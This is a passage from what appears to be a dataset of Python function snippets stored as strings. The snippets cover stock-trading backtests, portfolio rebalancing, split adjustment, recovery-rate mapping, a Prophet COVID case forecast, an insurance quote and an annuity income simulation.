data['FinalDecision'].iloc[i-1] == TransactionType.BUY:\n pass\n else:\n if (self.buys_made + self.sells_made) == 0:\n if first_purchase_method == FirstTransactionType.INIT_CAPITAL:\n self.shares_own = int((self.init_capital/data['Close'].iloc[i]))\n self.buys_made += 1\n elif first_purchase_method == FirstTransactionType.STOCK_QUANTITY:\n self.shares_own = self.stock_quantity\n self.buys_made += 1\n else:\n self.shares_own = int(self.final_capital / data['Close'].iloc[i])\n self.final_capital = self.final_capital % data['Close'].iloc[i]\n #print(self.shares_own)\n\n elif data['FinalDecision'].iloc[i] == TransactionType.SELL:\n if data['FinalDecision'].iloc[i-1] == TransactionType.SELL:\n pass\n else:\n if (self.buys_made + self.sells_made) == 0:\n pass\n else:\n self.final_capital += self.shares_own * data['Close'].iloc[i]\n self.shares_own = 0\n self.sells_made +=1\n #Checar si es el momento mas alto o bajo de ganancias\n if self.shares_own == 0:\n if (self.highest_point is None\n or self.highest_point < self.final_capital):\n self.highest_point = self.final_capital\n if (self.lowest_point is None\n or self.lowest_point > self.final_capital\n or self.lowest_point == 0):\n self.lowest_point = self.final_capital\n else:\n if (self.highest_point is None\n or self.highest_point < (self.shares_own * data['Close'].iloc[i])):\n self.highest_point = self.final_capital\n if (self.lowest_point is None\n or self.lowest_point > (self.shares_own * data['Close'].iloc[i])\n or self.lowest_point == 0):\n self.lowest_point = self.final_capital\n self.calcRealFinalCapital()\n self.calcDiferencePercentage()", "def get_output(data, capital=100000, leverage=1, commission=0, slippage=0):\n total_capital = capital * leverage\n df = data\n df['cnt'] = df.groupby('timestamp')['symbol'].transform(\n lambda x: len(x))\n df['qty'] = (total_capital/df['cnt']/df['price']).round()\n df['profit'] = df.eval('(sell-buy)*qty')\n df['commission'] = df.eval('(sell+buy)*qty') * commission * 0.01\n df['slippage'] = df.eval('(sell+buy)*qty') * slippage * 0.01\n df['net_profit'] = df.eval('profit - commission - slippage')\n return df", "def my_rebalance(context, data):\n freq_month = 3\n context.counter += 1\n if context.counter == freq_month:\n for stock, weight in context.weights.iteritems():\n context.counter = 0\n if data.can_trade(stock):\n order_target_percent(stock, weight)", "def calculate_forward_returns(data: pd.DataFrame, periods: list, price_key='close') -> pd.DataFrame:\n returns = pd.DataFrame(index=data.index)\n for period in periods:\n if type(data.index) == pd.MultiIndex:\n def multi_index_forward_returns(df: pd.DataFrame):\n return df[price_key].pct_change(periods=period).shift(-period)\n\n tmp = data.groupby(level=1).apply(multi_index_forward_returns).droplevel(0)\n returns[str(period) + '_period_return'] = tmp\n else:\n returns[str(period) + '_period_return'] = data[price_key].pct_change(periods=period).shift(-period)\n return returns", "def get_adjusted_data(stockSymbol, df):\n\n events = ['SPLIT', 'BONUS']\n arr = ['Open Price', 'High Price', 'Low Price',\n 'Last Price', 'Close Price', 'Average Price']\n\n stockSymbol = stockSymbol.replace('&', '%26')\n\n if(df.empty):\n print(\"Please check data. Dataframe is empty\")\n return df\n\n df.index = pd.to_datetime(df.index)\n df.sort_index(inplace=True)\n\n try:\n df = df.drop(['Prev Close'], axis=1)\n except KeyError:\n pass\n\n for event in events:\n\n ratio, dates = scrape_bonus_splits(stockSymbol, event)\n for i in range(len(dates)):\n\n date = datetime.datetime.strptime(dates[i], '%d-%b-%Y')\n print(event, \" on : \", dates[i], \" and ratio is : \", ratio[i])\n\n changed_data = df.loc[df.index < date]\n same_data = df.loc[df.index >= date]\n\n for j in arr:\n\n try:\n changed_data.loc[:, j] = changed_data.loc[:, j]/ratio[i]\n except TypeError:\n pass\n\n df = pd.concat([changed_data, same_data])\n\n return df", "def process_data(data):\n locale.setlocale(locale.LC_ALL, 'en_US.UTF8')\n max_revenue = {\"revenue\": 0}\n max_total_sales = {\"total_sales\": 0}\n all_years = {}\n for item in data:\n # Calculate the revenue generated by this model (price * total_sales)\n # We need to convert the price from \"$1234.56\" to 1234.56\n item_price = locale.atof(item[\"price\"].strip(\"$\"))\n item_revenue = item[\"total_sales\"] * item_price\n if item_revenue > max_revenue[\"revenue\"]:\n item[\"revenue\"] = item_revenue\n max_revenue = item\n # TODO: also handle max sales\n if item['total_sales'] > max_total_sales[\"total_sales\"]:\n max_total_sales = item\n # TODO: also handle most popular car_year\n if item['car']['car_year'] not in all_years:\n all_years[item['car']['car_year']] = 1\n else:\n all_years[item['car']['car_year']] += 1\n\n sorted_all_years = sorted(all_years.items(), key=operator.itemgetter(1))\n that_year = sorted_all_years[-1][0]\n print(that_year)\n year_sales = 0\n for item in data:\n if item['car']['car_year'] == that_year:\n year_sales = year_sales + item['total_sales']\n \n summary = [\n \"The {} generated the most revenue: ${}\".format(format_car(max_revenue[\"car\"]), max_revenue[\"revenue\"]), \"The {} had the most sales: {}\".format(format_car(max_total_sales[\"car\"]), max_total_sales[\"total_sales\"]), \"The most popular year was {} with {} sales.\".format(that_year, year_sales)\n ]\n\n return summary", "def trading_alg(self,table_name = None, buy_now = False, strategy_name = \"sma9\"):\n \n self.bs.buyed_stocks = 0\n self.bs.money = self.bs.startCredit\n spy_stocks = self.load_data(table_name = table_name, symbols = [\"SPY\"])\n spy_stocks = FinI.add_indicators(spy_stocks)\n \n if self.symbols:\n symbols = self.symbols\n else:\n symbols = self.db.get_symbols()\n\n # symbols = [\"INTC\",\"BYND\",\"ZM\",\"NKE\",\"HIMX\",\"JKS\",\"ENPH\",\"DUK\",\"GE\",\"DIS\",\"LEVI\",\"NVAX\",\"SLCA\",\"GPS\"]\n \n for symbol in symbols:\n print(\"symbol: \" + str(symbol))\n \n sub_data = self.load_data(table_name = table_name, symbols = symbol)\n if len(sub_data) < 1:\n break\n\n self.bt_stocks = FinI.add_indicators(sub_data)\n self.bt_stocks = FinI.add_fib(self.bt_stocks)\n # print(self.bt_stocks)\n print(self.bt_stocks[\"sma30\"])\n print(\"calculating percent change:\" + str(symbol))\n # sub_data = self.stocks.loc[self.stocks.sym ==symbol[0]].sort_values(by='index')\n \n self.symbols = symbol[0]\n \n # self.prev_stock = sub_data.iloc[0]\n # self.bt_stocks.iloc[0] = sub_data.iloc[0]\n\n # self.sell_marks = self.sell_marks.iloc[0:0]\n # self.buy_marks = self.buy_marks.iloc[0:0]\n self.bs.transactions = 0\n self.bs.profit_perc = 0\n \n # trend_indicator = \n # TODO mechanism for select strategies\n # self.ts_boll(buy_now = buy_now, at_settings = None, symbol = symbol, spy_stocks = spy_stocks)\n self.ts_eval(buy_now = buy_now, at_settings = None, symbol = symbol, spy_stocks = spy_stocks, strategy_logic = strategy_name)\n\n # call the method with passed and assembled name\n # method = getattr(self, 'ts_' + strategy_name)\n # method(buy_now = buy_now, at_settings = None, symbol = symbol, spy_stocks = spy_stocks, strategy_name = strategy_name)", "def sp_recovery_rate(model_df):\n new_rr_map = {'1+(100)': 0.75,\n '1(95%)': 0.70,\n '1(90%)': 0.65,\n '2(85%)': 0.625,\n '2(80%)': 0.60,\n '2(75%)': 0.55,\n '2(70%)': 0.5,\n '3(65%)': 0.45,\n '3(60%)': 0.4,\n '3(55%)': 0.35,\n '3(50%)': 0.3,\n '4(45%)': 0.285,\n '4(40%)': 0.27,\n '4(35%)': 0.235,\n '4(30%)': 0.20,\n '5(25%)': 0.175,\n '5(20%)': 0.15,\n '5(15%)': 0.10,\n '5(10%)': 0.05,\n '6(5%)': 0.035,\n '6(0%)': 0.02,\n '3H': 0.40,\n '1': 0.65}\n \n LienOne_map = {'AU':0.50,'AT':0.50,'BE':0.50,\n 'CA':0.50,'DK':0.50,'FI':0.50,'FR':0.50,\n 'DE':0.50,'HK':0.50,'IE':0.50,'IS':0.50,\n 'JP':0.50,'LU':0.50,'NL':0.50,'NO':0.50,\n 'PO':0.50,'PT':0.50,'SG':0.50,'ES':0.50,\n 'SE':0.50,'CH':0.50,'GB':0.50,'US':0.50,\n 'BR':0.39,'CZ':0.39,'GR':0.39,'IT':0.39,\n 'MX':0.39,'ZA':0.39,'TR':0.39,'UA':0.39}\n LienTwo_map = {'AU':0.18,'AT':0.18,'BE':0.18,\n 'CA':0.18,'DK':0.18,'FI':0.18,'FR':0.18,\n 'DE':0.18,'HK':0.18,'IE':0.18,'IS':0.18,\n 'JP':0.18,'LU':0.18,'NL':0.18,'NO':0.18,\n 'PO':0.18,'PT':0.18,'SG':0.18,'ES':0.18,\n 'SE':0.18,'CH':0.18,'GB':0.18,'US':0.18,\n 'BR':0.13,'CZ':0.13,'GR':0.13,'IT':0.13,\n 'MX':0.13,'ZA':0.13,'TR':0.13,'UA':0.13}\n \n bond_map = {'US':0.41}\n \n \n # if it the Recovery rate exists lookup in AAA table\n model_df['S&P Recovery Rate (AAA)'] = model_df['S&P Recovery'].map(new_rr_map)\n #map(dict(new_rr[['S&P Recovery Rating\\nand Recovery\\nIndicator of\\nCollateral Obligations','“AAA”']].values))\n \n # doesn't exist, but first lien, use first lien table\n model_df.loc[pd.isna(model_df['S&P Recovery']) & (model_df['Lien Type']== 'First Lien'),'S&P Recovery Rate (AAA)'] =\\\n model_df.loc[pd.isna(model_df['S&P Recovery']) & (model_df['Lien Type']== 'First Lien'),'Issuer Country'].\\\n map(LienOne_map)\n #map(dict(lien[['Country Abv','RR']].values))\n \n \n # doesn't exist, but 2nd lien, use 2nd lien table\n model_df.loc[pd.isna(model_df['S&P Recovery']) & (model_df['Lien Type']== 'Second Lien'),'S&P Recovery Rate (AAA)'] = \\\n model_df.loc[pd.isna(model_df['S&P Recovery']) & (model_df['Lien Type']== 'Second Lien'),'Issuer Country'].\\\n map(LienTwo_map)\n #map(dict(lien[['Country Abv','RR.2nd']].values))\n \n # the bonds\n model_df.loc[pd.isna(model_df['S&P Recovery']) & pd.isna(model_df['Lien Type']),'S&P Recovery Rate (AAA)'] = \\\n model_df.loc[pd.isna(model_df['S&P Recovery']) & pd.isna(model_df['Lien Type']),'Issuer Country'].\\\n map(bond_map)\n #map(dict(bond_table[['Country Abv.1','RR.1']].values))\n\n return model_df", "def build_prophet_preds(data_url: str,\n changepoint_scale: float,\n holidays_scale: float,\n seasonality_scale: float,\n growth ='logistic') -> DataFrame:\n\n # read in the data\n df = pd.read_csv(data_url, parse_dates=['date'])\n\n ### PART 1: USE PROPHET TO FIT TOP-LEVEL FORECAST ON ALL CASES\n\n # get total number of cases for each day\n cases = df.groupby('date')['positiveIncrease'].sum().reset_index()\n cases.rename({'date': 'ds', 'positiveIncrease': 'y'}, axis=1, inplace=True)\n\n # variables we'll use a few times\n cap = 1000000\n floor = 0\n\n # add cap + floor for logistic growth model\n cases['cap'] = cap\n cases['floor'] = floor\n\n # initialize -- parameters were set via cross validation -- see notebook for covid modeling for more detail\n mod = Prophet(growth='logistic',\n changepoint_prior_scale = changepoint_scale,\n holidays_prior_scale = holidays_scale,\n seasonality_prior_scale = seasonality_scale)\n\n mod.add_country_holidays(country_name='US')\n\n print(f\"Fitting Model with parameters: changepoint_scale = {mod.changepoint_prior_scale}, holidays_scale: {mod.holidays_prior_scale}, seasonality_scale: {mod.seasonality_prior_scale}\")\n mod.fit(cases)\n\n # make df for future predictions -- seven days from most recent date in data set\n dates = pd.date_range(df['date'].max() + pd.DateOffset(days=1), periods=7).tolist()\n df_vals = [(date, cap, floor) for date in dates]\n future = pd.DataFrame(df_vals, columns=['ds', 'cap', 'floor'])\n\n # get top level predictions for each day in our forecast\n top_level_preds = mod.predict(future)[['ds', 'yhat', 'yhat_upper', 'yhat_lower']]\n\n ### PART 2: PROJECT TOP LEVEL PREDICTIONS DOWN TO ALL 50 STATES!\n\n # create new df with date/state pairs for each state and date for forecast dates\n states = df['state'].unique().tolist()\n test_df_vals = [(date, state) for date in dates for state in states]\n test_df = pd.DataFrame(test_df_vals, columns=['date', 'state']).sort_values(by='date')\n\n # get 7 day moving average of proportions for each state in our dataset, as of last day of recorded data\n train_grp = df.groupby('date')['positiveIncrease'].sum()\n train_cases = df.merge(train_grp, on='date', how='left')\n train_cases.rename({'positiveIncrease_y': 'totalCases'}, axis=1, inplace=True)\n train_cases['proportion'] = train_cases['positiveIncrease_x'] / train_cases['totalCases']\n train_cases.set_index(['state', 'date'], inplace=True)\n train_cases.sort_index(level=[0, 1], inplace=True)\n prop_moving_avgs = train_cases.groupby(level=0)['proportion'].rolling(7).mean()\n final_props = prop_moving_avgs.groupby(level=0).last()\n\n # merge proportions w/ preds_df on each unique date, proportion values\n test_df = test_df.merge(final_props, left_on='state', right_index=True, how='left')\n test_df = test_df.merge(top_level_preds, left_on='date', right_on='ds', how='left')\n test_df.dropna(inplace=True)\n\n # this loop takes each of our top level forecasted values, and multiplies them by the proportion\n # for each state on each day\n for col in ['yhat', 'yhat_upper', 'yhat_lower']:\n test_df[col] = test_df['proportion'] * test_df[col]\n\n # don't need these columns\n test_df.drop(['ds', 'proportion'], axis=1, inplace=True)\n\n # re-organize df to get a column for upper, lower, middle prediction for each state on each day\n test_df = test_df.pivot(index='state', columns='date', values=['yhat', 'yhat_upper', 'yhat_lower'])\n\n # following lines are to format test_df to something more readable in the database\n\n # get unique dates in test_df, in ascending order\n times = sorted(list(set(time for label, time in test_df.columns if 'yhat' in label)))\n # rename test_df columns to make them more semantic\n columns = [f'day{i}_{ending}' for ending in ['pred', 'pred_upper', 'pred_lower'] for i in range(1, len(times) + 1)]\n test_df.columns = columns\n\n # note what date day 1, 2, 3, etc actually are\n for idx, time in enumerate(times, start=1):\n test_df[f\"day{idx}_date\"] = time\n\n # popout out the state index one more time\n test_df.reset_index(inplace=True)\n\n # these last lines add a final line to test_df for total values for the entire usa\n num_vals = test_df.select_dtypes(include=np.number).sum()\n time_vals = test_df.select_dtypes(include=np.datetime64).iloc[0]\n index_vals = num_vals.index.tolist() + time_vals.index.tolist()\n index_vals.insert(0, 'state')\n\n series_vals = num_vals.tolist() + time_vals.tolist()\n series_vals.insert(0, 'USA')\n\n test_df = test_df.append(pd.Series(series_vals, index=index_vals), ignore_index=True)\n test_df['model'] = 'Prophet'\n test_df['dt'] = np.datetime64('now')\n\n return test_df", "def compute_quotation_price(self):\n result = decimal.Decimal('0')\n if self.vehiculePrice:\n result = self.vehiculePrice * 2 / 100\n if self.covWind:\n result += get_coverage_price_by_name(\"WIND\")\n if self.covPass:\n result += get_coverage_price_by_name(\"PASS\")\n if self.covFlood:\n result += get_coverage_price_by_name(\"FLOOD\")\n return result", "def income_model_constant_portfolio_return(num_of_years=30, trials=100, method='normal'):\n\n sim_fia_cv = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_base_total = pd.DataFrame(index=range(num_of_years + 1))\n sim_base_income = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_port_total = pd.DataFrame(index=range(num_of_years + 1))\n sim_port_income = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_base_total_pre_income = pd.DataFrame(index=range(num_of_years + 1))\n sim_port_total_pre_income = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_base_total_preincome = pd.DataFrame(index=range(num_of_years + 1))\n sim_port_total_preincome = pd.DataFrame(index=range(num_of_years + 1))\n\n # read_income_inputs = pd.read_csv(src + \"income_model_inputs.csv\", index_col='Items')\n read_income_inputs = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='income_model_inputs',\n index_col=[0])\n\n # read_returns_est = pd.read_csv(src + \"income_assets_returns_estimates.csv\", index_col='Symbol')\n read_returns_est = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='income_assets_returns_estimates',\n index_col=[0])\n\n # read_returns_est.drop(['BM', read_returns_est.index[-1]], axis=0, inplace=True)\n # read_portfolio_inputs = pd.read_csv(src + \"income_portfolio_inputs.csv\", index_col='Items')\n\n # read_asset_weights = pd.read_csv(src + \"asset_weights.csv\", index_col='Asset')\n read_asset_weights = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='asset_weights',\n index_col=[0])\n\n read_asset_weights.drop(read_asset_weights.index[-1], axis=0, inplace=True)\n\n # read random returns for simulation\n read_normal = pd.read_csv(src + 'sort_normal.csv', index_col=[0], parse_dates=True)\n read_small = pd.read_csv(src + 'sort_small_to_large.csv', index_col=[0], parse_dates=True)\n read_large = pd.read_csv(src + 'sort_large_to_small.csv', index_col=[0], parse_dates=True)\n assets_col_names = list(read_normal.columns)\n\n tickers = list(read_asset_weights.index)\n wts = np.array(read_asset_weights.loc[:, 'base'])\n\n def asset_median_returns(data, ticker):\n return data.filter(regex=ticker).median(axis=1)\n\n # # dataframe for unsorted returns (normal)\n # median_returns_normal = pd.DataFrame({t: asset_median_returns(read_normal, t) for t in tickers})\n # median_returns_normal.loc[:, 'portfolio_return'] = median_returns_normal.dot(wts)\n # median_normal_fia = pd.DataFrame({'FIA': asset_median_returns(read_normal, 'r_FIA')})\n #\n # # dataframe for smallest to largest returns\n # median_returns_smallest = pd.DataFrame({t: asset_median_returns(read_small, t) for t in tickers})\n # median_returns_smallest.loc[:, 'portfolio_return'] = median_returns_smallest.dot(wts)\n # median_smallest_fia = pd.DataFrame({'FIA': asset_median_returns(read_small, 'r_FIA')})\n #\n # # dataframe for unsorted returns (normal)\n # median_returns_largest = pd.DataFrame({t: asset_median_returns(read_large, t) for t in tickers})\n # median_returns_largest.loc[:, 'portfolio_return'] = median_returns_largest.dot(wts)\n # median_largest_fia = pd.DataFrame({'FIA': asset_median_returns(read_large, 'r_FIA')})\n\n years = list(range(0, num_of_years + 1))\n income_cols = ['year', 'strategy_term', 'index_returns', 'term_ret', 'term_ret_with_par', 'term_annualize',\n 'ann_net_spread', 'term_ret_netspr', 'high_inc_benefit_base', 'rider_fee', 'eoy_income',\n 'contract_value']\n\n term = int(read_income_inputs.loc['term', 'inputs'])\n fia_ret = read_returns_est.loc[read_returns_est.index[-1], 'Annualized Returns']\n fia_risk = read_returns_est.loc[read_returns_est.index[-1], 'Annualized Risk']\n par_rate = float(read_income_inputs.loc['par_rate', 'inputs'])\n spread = float(read_income_inputs.loc['spread', 'inputs'])\n bonus_term = int(read_income_inputs.loc['bonus_term', 'inputs'])\n premium = float(read_income_inputs.loc['premium', 'inputs'])\n income_bonus = float(read_income_inputs.loc['income_bonus', 'inputs'])\n\n income_starts = int(read_income_inputs.loc['start_income_years', 'inputs'])\n income_growth = float(read_income_inputs.loc['income_growth', 'inputs'])\n rider_fee = float(read_income_inputs.loc['rider_fee', 'inputs'])\n inc_payout_factor = float(read_income_inputs.loc['income_payout_factor', 'inputs'])\n contract_bonus = float(read_income_inputs.loc['contract_bonus', 'inputs'])\n social = float(read_income_inputs.loc['social', 'inputs'])\n inflation = float(read_income_inputs.loc['inflation', 'inputs'])\n wtd_cpn_yield = float(read_income_inputs.loc['wtd_coupon_yld', 'inputs'])\n life_expectancy = int(read_income_inputs.loc['life_expectancy_age', 'inputs'])\n clients_age = int(read_income_inputs.loc['clients_age', 'inputs'])\n \n # -------------For Constant Growth Rates------------------------\n const_fia_index_ret = float(read_income_inputs.loc['const_fia_index_ret', 'inputs'])\n const_risky_port_ret = float(read_income_inputs.loc['const_risky_port_ret', 'inputs'])\n\n # ---------------INCOME MODEL--------------------------------------------\n runs = 0\n returns_dict = {}\n asset_dict = {}\n fia_dict = {}\n\n income_df = pd.DataFrame(index=years, columns=income_cols)\n income_df.loc[:, 'year'] = years\n income_df.loc[:, 'strategy_term'] = income_df.loc[:, 'year'] % term\n income_df.loc[:, 'strategy_term'] = income_df['strategy_term'].apply(lambda x: 1 if x == 0 else 0)\n\n if method == 'normal':\n # income_df.loc[:, 'index_returns'] = read_normal.loc[:, '{}_{}'.format('r_FIA', str(runs))]\n # ----------CONSTANT FIA INDEX GROWTH RATE-------------------\n income_df.loc[:, 'index_returns'] = const_fia_index_ret\n\n elif method == 'smallest':\n income_df.loc[:, 'index_returns'] = read_small.loc[:, '{}_{}'.format('r_FIA', str(runs))]\n\n else:\n income_df.loc[:, 'index_returns'] = read_large.loc[:, '{}_{}'.format('r_FIA', str(runs))]\n\n # income_df.loc[:, 'index_returns'] = np.random.normal(fia_ret, fia_risk, size=(len(years), 1))\n\n cumprod = (1. + income_df['index_returns']).rolling(window=term).agg(lambda x: x.prod()) - 1\n income_df.loc[:, 'term_ret'] = np.where(income_df.loc[:, 'strategy_term'] == 1, cumprod, 0)\n income_df.loc[:, 'term_ret_with_par'] = income_df.loc[:, 'term_ret'] * par_rate\n income_df.loc[:, 'term_annualize'] = income_df.loc[:, 'term_ret_with_par'].apply(\n lambda x: (1 + x) ** (1 / term) - 1)\n income_df.loc[:, 'ann_net_spread'] = income_df.loc[:, 'term_annualize'] - spread\n income_df.loc[:, 'ann_net_spread'] = np.where(income_df.loc[:, 'strategy_term'] == 1,\n income_df.loc[:, 'ann_net_spread'], 0)\n income_df.loc[:, 'term_ret_netspr'] = income_df.loc[:, 'ann_net_spread'].apply(lambda x: (1 + x) ** term - 1)\n\n for counter in years:\n if counter == 0:\n income_df.loc[counter, 'high_inc_benefit_base'] = premium * (1 + income_bonus)\n\n elif counter <= min(bonus_term, income_starts):\n income_df.loc[counter, 'high_inc_benefit_base'] = income_df.loc[counter - 1, 'high_inc_benefit_base'] * \\\n (1 + income_growth)\n else:\n income_df.loc[counter, 'high_inc_benefit_base'] = income_df.loc[counter - 1, 'high_inc_benefit_base']\n\n income_df.loc[:, 'rider_fee'] = income_df.loc[:, 'high_inc_benefit_base'] * rider_fee\n income_df.loc[:, 'eoy_income'] = np.where(income_df.loc[:, 'year'] > income_starts,\n income_df.loc[:, 'high_inc_benefit_base'] * inc_payout_factor, 0)\n\n for counter in years:\n if counter == 0:\n income_df.loc[counter, 'contract_value'] = premium * (1 + contract_bonus)\n\n elif income_df.loc[counter, 'strategy_term'] == 1:\n x1 = income_df.loc[counter - 1, 'contract_value'] - income_df.loc[counter, 'rider_fee']\n x2 = (x1 * (1 + income_df.loc[counter, 'term_ret_netspr'])) - income_df.loc[counter, 'eoy_income']\n income_df.loc[counter, 'contract_value'] = x2\n\n else:\n x1 = income_df.loc[counter - 1, 'contract_value'] - income_df.loc[counter, 'rider_fee'] - \\\n income_df.loc[counter, 'eoy_income']\n\n income_df.loc[counter, 'contract_value'] = x1\n\n # variable stores the income number that is used in the base and fia portfolio calcs.\n\n income_from_fia = income_df.loc[income_df.index[-1], 'eoy_income']\n\n income_df.loc[:, 'contract_value'] = income_df.loc[:, 'contract_value'].apply(lambda x: 0 if x <= 0 else x)\n\n sim_fia_cv.loc[:, str(runs)] = income_df.loc[:, 'contract_value']\n\n # -------------------------------------BASE MODEL---------------------------------------------\n\n base_wts = read_asset_weights.loc[:, 'base']\n base_assets = list(base_wts.index)\n base_weights = list(base_wts.values)\n base_returns = list(read_returns_est.loc[:, 'Annualized Returns'].values)\n base_std = list(read_returns_est.loc[:, 'Annualized Risk'].values)\n\n base_investment = float(read_income_inputs.loc['risky_assets', 'Base'])\n adv_fees = float(read_income_inputs.loc['advisor_fees', 'Base'])\n\n # -------------------required income----------------------------------\n req_annual_income = float(read_income_inputs.loc['annual_income', 'inputs'])\n income_needed = req_annual_income - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n cpn_income_base = base_investment * wtd_cpn_yield\n\n # ----------------------RANDOM RETURNS--------------------------\n r_cols = ['r_{}'.format(name) for name in base_assets]\n boy_value = ['bv_{}'.format(name) for name in base_assets]\n eoy_value = ['ev_{}'.format(name) for name in base_assets]\n\n random_returns = pd.DataFrame(index=income_df.index, columns=r_cols)\n\n # for c in range(len(r_cols)):\n # ret = np.random.normal(base_returns[c], base_std[c], size=(len(random_returns.index), 1))\n\n if method == 'smallest':\n this_run_cols = ['{}_{}'.format(cname, str(runs)) for cname in r_cols]\n random_returns = read_small.loc[:, this_run_cols]\n\n # random_returns.loc[:, r_cols[c]] = np.sort(ret.flatten())\n # asset_dict.update({'{}_{}'.format(r_cols[c], str(runs)): np.sort(ret.flatten())})\n\n elif method == 'largest':\n this_run_cols = ['{}_{}'.format(cname, str(runs)) for cname in r_cols]\n random_returns = read_large.loc[:, this_run_cols]\n\n # random_returns.loc[:, r_cols[c]] = np.flip(np.sort(ret.flatten()))\n # asset_dict.update({'{}_{}'.format(r_cols[c], str(runs)): np.flip(np.sort(ret.flatten()))})\n\n else:\n this_run_cols = ['{}_{}'.format(cname, str(runs)) for cname in r_cols]\n random_returns = read_normal.loc[:, this_run_cols]\n\n # random_returns.loc[:, r_cols[c]] = ret.flatten()\n # asset_dict.update({'{}_{}'.format(r_cols[c], str(runs)): ret.flatten()})\n\n # store the simulated assets returns in one dictionary\n # returns_dict.update({str(runs): random_returns})\n\n # collect the asset based returns from all simulation and calculate the median returns.\n # def get_median_returns(sym):\n # cols = [sym + '_' + str(c) for c in np.arange(trials)]\n # asset_df = pd.DataFrame({c: asset_dict.get(c) for c in cols})\n # return asset_df.median(axis=1)\n #\n # asset_median_returns = pd.DataFrame({symbol: get_median_returns(symbol) for symbol in r_cols})\n #\n # asset_median_returns.loc[:, 'simulated_portfolio_median_returns'] = asset_median_returns.dot(base_weights)\n\n base_df = random_returns.copy()\n pre_income_base_df = random_returns.copy()\n\n # base_investment = float(read_portfolio_inputs.loc['risky_assets', 'Base'])\n\n fia_portfolio_df = random_returns.copy()\n pre_income_port_df = random_returns.copy()\n port_investment = float(read_income_inputs.loc['risky_assets', 'FIA'])\n cpn_income_port = port_investment * wtd_cpn_yield\n\n # ---------Initial Investments for pre-income account values---------------------\n pre_income_base_inv = base_investment\n pre_income_port_inv = port_investment\n # ----------------------------------------BASE PORTFOLIO----------------------------\n for name in boy_value:\n base_df.loc[:, name] = 0.0\n pre_income_base_df.loc[:, name] = 0.0\n\n for counter in years:\n period_returns = list(random_returns.loc[counter, :])\n if counter == 0:\n # ---------------For year 0, the year of investment------------\n\n # ------------Calculate the annual portfolio returns - Gross Returns--------------------\n base_df.loc[counter, boy_value] = [base_weights[c] * base_investment for c in range(len(boy_value))]\n\n # -------------Record the Pre Income Base Portfolio-----------------------------\n\n pre_income_base_df.loc[counter, boy_value] = [base_weights[c] *\n pre_income_base_inv for c in range(len(boy_value))]\n pre_income_base_df.loc[counter, 'total'] = pre_income_base_df.loc[counter, boy_value].sum()\n pre_income_base_inv = pre_income_base_df.loc[counter, boy_value].sum()\n\n # ------------------Pre Income Block Ends------------------------\n\n base_df.loc[counter, 'total'] = base_df.loc[counter, boy_value].sum()\n\n base_df.loc[counter, 'total_net_fees'] = 0.0\n base_df.loc[counter, 'income'] = 0.0\n # base_investment = base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'total_pre_income'] = base_investment\n\n elif (counter > 0) and (counter < income_starts):\n\n # ----For years between the start of the investment and start if the income---------------\n base_df.loc[counter, boy_value] = [base_weights[c] * base_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # -------------Record the Pre Income Base Portfolio-----------------------------\n pre_income_base_df.loc[counter, boy_value] = [\n base_weights[c] * pre_income_base_inv * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # pre_income_base_df.loc[counter, 'total'] = pre_income_base_df.loc[counter, boy_value].sum()\n pre_income_base_df.loc[counter, 'total'] = base_investment * (1 + const_risky_port_ret)\n pre_income_base_df.loc[counter, 'adv_fees'] = pre_income_base_df.loc[counter, 'total'] * adv_fees\n pre_income_base_df.loc[counter, 'total_net_fees'] = pre_income_base_df.loc[counter, 'total'] - \\\n pre_income_base_df.loc[counter, 'adv_fees']\n pre_income_base_inv = pre_income_base_df.loc[counter, 'total_net_fees'] + cpn_income_base\n\n # ------------------Pre Income Block Ends------------------------\n\n # base_df.loc[counter, 'total'] = base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'total'] = base_investment * (1 + 0.06)\n base_df.loc[counter, 'adv_fees'] = base_df.loc[counter, 'total'] * adv_fees\n base_df.loc[counter, 'total_net_fees'] = base_df.loc[counter, 'total'] - base_df.loc[\n counter, 'adv_fees']\n\n # --coupon payment is invested back into the risky portfolio until the income is withdrawn----\n base_investment = base_df.loc[counter, 'total_net_fees'] + cpn_income_base\n base_df.loc[counter, 'total_pre_income'] = base_df.loc[counter, 'total_net_fees']\n\n else:\n\n # -------------For Years after the income started----------------------\n base_df.loc[counter, boy_value] = [base_weights[c] * base_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # -------------Record the Pre Income Base Portfolio-----------------------------\n pre_income_base_df.loc[counter, boy_value] = [\n base_weights[c] * pre_income_base_inv * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # pre_income_base_df.loc[counter, 'total'] = pre_income_base_df.loc[counter, boy_value].sum()\n pre_income_base_df.loc[counter, 'total'] = base_investment * (1 + const_risky_port_ret)\n pre_income_base_df.loc[counter, 'adv_fees'] = pre_income_base_df.loc[counter, 'total'] * adv_fees\n pre_income_base_df.loc[counter, 'total_net_fees'] = pre_income_base_df.loc[counter, 'total'] - \\\n pre_income_base_df.loc[counter, 'adv_fees']\n pre_income_base_inv = pre_income_base_df.loc[counter, 'total_net_fees'] + cpn_income_base\n\n # ------------------Pre Income Block Ends------------------------\n\n # base_df.loc[counter, 'total'] = base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'total'] = base_investment * (1 + const_risky_port_ret)\n base_df.loc[counter, 'adv_fees'] = base_df.loc[counter, 'total'] * adv_fees\n\n # ---req. income is adjusted for inflation from the second year of withdrawal. Reinvestment of coupon\n # stops from the year income starts. Req. income is reduced by the coupon payments\n\n if counter == income_starts:\n\n income_needed = req_annual_income - social\n base_df.loc[counter, 'income'] = income_needed - cpn_income_base\n income_needed = req_annual_income\n\n else:\n income_needed = income_needed * (1 + inflation) - social\n base_df.loc[counter, 'income'] = income_needed - cpn_income_base\n income_needed = income_needed + social\n\n base_df.loc[counter, 'total_net_fees'] = base_df.loc[counter, 'total'] - \\\n base_df.loc[counter, 'adv_fees'] - \\\n base_df.loc[counter, 'income']\n\n base_df.loc[counter, 'total_pre_income'] = base_df.loc[counter, 'total'] - 